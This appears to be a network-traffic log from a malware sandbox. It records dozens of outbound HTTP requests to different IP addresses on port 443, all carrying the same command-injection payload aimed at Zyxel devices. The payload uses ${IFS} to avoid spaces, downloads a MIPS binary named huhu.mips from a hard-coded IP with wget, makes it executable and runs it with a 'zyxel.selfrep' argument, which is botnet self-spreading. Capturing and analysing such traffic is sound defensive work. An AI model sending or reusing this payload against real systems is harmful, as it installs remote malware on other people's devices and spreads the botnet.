                                            Feb 2, 2024 06:21:25.897155046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7945192.168.2.1547426175.53.90.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897190094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7946192.168.2.1543174135.95.133.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897212029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7947192.168.2.1540416149.120.143.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897267103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7948192.168.2.153653259.188.94.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897303104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7949192.168.2.153907480.16.43.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897342920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7950192.168.2.154835286.244.172.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897392988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7951192.168.2.1538396196.11.190.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897438049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7952192.168.2.154952688.188.49.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897492886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7953192.168.2.1555562137.163.252.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897501945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7954192.168.2.1545234200.161.91.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897552013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7955192.168.2.154603636.176.180.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897577047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7956192.168.2.154395619.152.197.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897630930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7957192.168.2.1543978199.32.133.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897655964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7958192.168.2.154466646.84.19.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897702932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7959192.168.2.1545198107.193.67.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897737026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7960192.168.2.1557010190.38.12.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897782087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7961192.168.2.153518866.122.182.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897815943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7962192.168.2.15518468.108.129.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897854090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7963192.168.2.1537000116.103.246.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897898912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7964192.168.2.153653283.239.152.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897926092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7965192.168.2.1547344205.189.172.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897938013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7966192.168.2.1544874145.151.82.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898010015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7967192.168.2.155266094.190.151.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898030996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7968192.168.2.155997849.177.23.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898056984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7969192.168.2.155097483.44.136.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898114920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7970192.168.2.154443239.52.58.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898149967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7971192.168.2.153719884.246.231.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898190022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7972192.168.2.1544038112.166.156.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898226976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7973192.168.2.1547974218.246.108.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898278952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7974192.168.2.1557080158.165.197.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898309946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7975192.168.2.155418871.219.7.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898361921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7976192.168.2.1548960209.78.30.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898396015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7977192.168.2.1545648166.104.92.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898417950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7978192.168.2.1537514174.184.20.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898468018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7979192.168.2.1549494195.210.138.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898502111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7980192.168.2.1538276157.212.95.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898564100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7981192.168.2.1540350174.237.180.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898588896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7982192.168.2.1544750155.45.79.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898612022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7983192.168.2.1533314188.92.226.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.898633957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7984192.168.2.1542822200.215.135.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.899115086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7985192.168.2.1560628213.18.111.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.899276972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7986192.168.2.154577673.27.185.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.900295973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7987192.168.2.1539192203.31.142.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.901155949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7988192.168.2.154299276.219.247.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.902290106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7989192.168.2.1551730195.66.126.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.902338982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7990192.168.2.1547456175.81.93.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.902395010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7991192.168.2.153601241.105.227.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.902439117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7992192.168.2.1534854175.84.111.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.902491093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7993192.168.2.153590814.234.192.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.902508020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7994192.168.2.156012086.133.245.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910506010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7995192.168.2.1543248152.60.203.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910536051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7996192.168.2.153367289.123.54.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910571098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7997192.168.2.1551458129.85.59.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910589933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7998192.168.2.1551718114.105.19.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910634041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7999192.168.2.1544904148.44.152.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910672903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8000192.168.2.154593659.167.120.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910708904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8001192.168.2.1548608174.1.160.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910743952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8002192.168.2.1540378180.244.243.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910789013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8003192.168.2.1549856113.131.221.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910846949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8004192.168.2.155610618.229.240.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910867929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8005192.168.2.1560734223.197.55.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910912991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8006192.168.2.155737293.194.224.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910947084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8007192.168.2.1553350211.60.110.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.910999060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8008192.168.2.1543204136.44.228.209443
                                            TimestampBytes transferredDirectionData
